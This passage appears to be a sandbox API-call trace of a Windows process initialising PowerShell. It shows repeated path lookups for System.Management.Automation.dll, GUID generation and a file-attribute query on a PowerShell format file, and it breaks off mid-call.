[0253.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.167] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xa9d7d4ae, Data2=0x5088, Data3=0x4fc6, Data4=([0]=0xbe, [1]=0xdc, [2]=0x47, [3]=0xd, [4]=0x2e, [5]=0xb9, [6]=0x10, [7]=0x84))) returned 0x0 [0253.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.172] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xc9f40401, Data2=0x3a56, Data3=0x4037, Data4=([0]=0x87, [1]=0x59, [2]=0x89, [3]=0xbe, [4]=0x14, [5]=0xc3, [6]=0x59, [7]=0x5e))) returned 0x0 [0253.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.177] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x72196fad, Data2=0xa73d, Data3=0x458a, Data4=([0]=0x87, [1]=0xd, [2]=0x3f, [3]=0x89, [4]=0x9c, [5]=0xfc, [6]=0xb8, [7]=0xa5))) returned 0x0 [0253.180] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xeaa89995, Data2=0x4390, Data3=0x49c1, Data4=([0]=0x81, [1]=0xca, [2]=0xb1, [3]=0x73, [4]=0x5e, [5]=0xef, [6]=0xde, [7]=0x0))) returned 0x0 [0253.183] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xd52efac6, Data2=0xd6af, Data3=0x4276, Data4=([0]=0x92, [1]=0xa3, [2]=0x2d, [3]=0x84, [4]=0x2c, [5]=0xe2, [6]=0x84, [7]=0x35))) returned 0x0 [0253.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.187] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xe3eec92f, Data2=0x7cdc, Data3=0x4cf2, Data4=([0]=0x84, [1]=0x97, [2]=0x88, [3]=0xec, [4]=0x64, [5]=0x97, [6]=0xd9, [7]=0xe2))) returned 0x0 [0253.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.224] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xfaa4d353, Data2=0xa48b, Data3=0x4648, Data4=([0]=0xbf, [1]=0x31, [2]=0xfd, [3]=0x2d, [4]=0x35, [5]=0xac, [6]=0x17, [7]=0x54))) returned 0x0 [0253.226] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x250291bb, Data2=0xca57, Data3=0x41a0, Data4=([0]=0x84, [1]=0x9f, [2]=0x48, [3]=0x77, [4]=0x1c, [5]=0x18, [6]=0x60, [7]=0xa))) returned 0x0 [0253.228] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x98a78128, Data2=0x6484, Data3=0x4941, Data4=([0]=0xba, [1]=0xdf, [2]=0x54, [3]=0x7, [4]=0x35, [5]=0x89, [6]=0x38, [7]=0xed))) returned 0x0 [0253.229] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xec36fe58, Data2=0x582f, Data3=0x4fc2, Data4=([0]=0x81, [1]=0xbc, [2]=0xd7, [3]=0x2c, [4]=0xfa, [5]=0x52, [6]=0x79, [7]=0xcb))) returned 0x0 [0253.229] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x88f3e055, Data2=0x5544, Data3=0x4578, Data4=([0]=0xa5, [1]=0x65, [2]=0xb5, [3]=0x45, [4]=0x5f, [5]=0xa2, [6]=0x5e, [7]=0x7e))) returned 0x0 [0253.230] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x1ddae8fa, Data2=0xc744, Data3=0x40e9, Data4=([0]=0xbc, [1]=0x0, [2]=0x6, [3]=0x74, [4]=0xba, [5]=0x91, [6]=0xb8, [7]=0x7a))) returned 0x0 [0253.231] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xe65a5cd3, Data2=0xe516, Data3=0x4609, Data4=([0]=0xa8, [1]=0x30, [2]=0xec, [3]=0x20, [4]=0xe3, [5]=0xd5, [6]=0xe1, [7]=0xa6))) returned 0x0 [0253.231] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x6e64fed6, Data2=0xa7a2, Data3=0x4d97, Data4=([0]=0xa1, [1]=0x17, [2]=0xc9, [3]=0x1d, [4]=0x31, [5]=0xeb, [6]=0x60, [7]=0x65))) returned 0x0 [0253.232] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xc1481cda, Data2=0xef68, Data3=0x4307, Data4=([0]=0xad, [1]=0x8f, [2]=0xc8, [3]=0x2d, [4]=0x14, [5]=0x4d, [6]=0x8, [7]=0x1a))) returned 0x0 [0253.232] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xe2c53aff, Data2=0xf1cf, Data3=0x416c, Data4=([0]=0xb9, [1]=0xc7, [2]=0xc0, [3]=0xf9, [4]=0xab, [5]=0xaa, [6]=0x39, [7]=0x35))) returned 0x0 [0253.244] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0253.244] SetErrorMode (uMode=0x1) returned 